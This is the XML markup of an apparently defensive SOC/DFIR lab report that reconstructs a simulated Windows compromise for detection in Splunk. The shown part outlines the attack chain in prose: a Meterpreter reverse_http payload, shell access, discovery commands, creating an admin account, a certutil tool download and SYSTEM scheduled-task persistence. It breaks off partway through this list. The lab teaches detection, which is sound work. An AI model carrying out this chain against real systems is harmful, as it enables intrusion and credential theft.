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608BE">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>SECURITY OPERATIONS / DFIR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3667100E">
      <w:pPr>
        <w:spacing w:before="500" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:t>SOC Threat Detection Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:sz w:val="68"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693B4C0">
      <w:pPr>
        <w:spacing w:after="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulated Attack </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Investigation Using Sysmon, Splunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Log Correlation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10148"/>
      </w:tblGrid>
      <w:tr w14:paraId="300FB9EA">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:color="1F6FEB" w:sz="18" w:space="0"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF2FF"/>
          </w:tcPr>
          <w:p w14:paraId="44194370">
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="1F6FEB"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>PURPOSE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Reconstruct a controlled endpoint compromise from delivery and user execution through command-and-control, discovery, persistence, tool transfer and credential-access activity, then prove how each stage becomes detectable in a SOC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60D566F8">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5BE114">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6435725" cy="3669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r="2454" b="10140"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6435725" cy="3669030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3366DFF7">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Figure 1. Senior attack and detection map for the complete lab scenario.</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3"/>
        <w:gridCol w:w="3333"/>
        <w:gridCol w:w="3333"/>
      </w:tblGrid>
      <w:tr w14:paraId="4412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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="1AA12765">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A64162A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0215C810">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="4DFFA20B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C3B6E82">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="78A58456">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="778CDA1F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Primary responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A7C7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3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="13198915">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DE6AB0A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="10331B81">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D47C370">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="09744DAB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Metasploit payload staging, listener and controlled post-compromise actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="74B31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3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="574D72FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A7B2BBE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F51D44A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07FFB30F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Windows 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4CEA5773">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>User executes the payload; Sysmon and Windows Security generate evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4AD8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3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5C1F66CD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40178FDA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6686B95B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C267CFD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4B77ED7A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Splunk Enterprise receives, searches, correlates and alerts on telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2954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3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A436AC1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1088885F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2690E5CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C4E1A03">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SOC / DFIR workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A7DEE67">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Timeline reconstruction, ATT&amp;CK mapping, detection and response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="111CBFE8">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E0924A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B925590">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>01 / CASE OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66665E">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E75EF5">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>What happened, what was collected, and what the investigator is expected to prove.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD201CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Generate and deliver the Meterpreter payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>windows/x64/meterpreter/reverse_http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Windows endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE73043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Establish a reverse HTTP Meterpreter session from Windows 10 back to the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308F7CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open a Windows command shell through the Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678B275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Perform system discovery using `whoami`, `hostname`, and `systeminfo`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDED44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a local user account and add the user into local Administrators group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654ACA4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Download a credential-access tool using `certutil` and save it under a different filename.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3E213">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a scheduled task configured to execute the payload at logon with SYSTEM privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C746868">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remove the temporary local user account after establishing the persistence mechanism.</w:t>
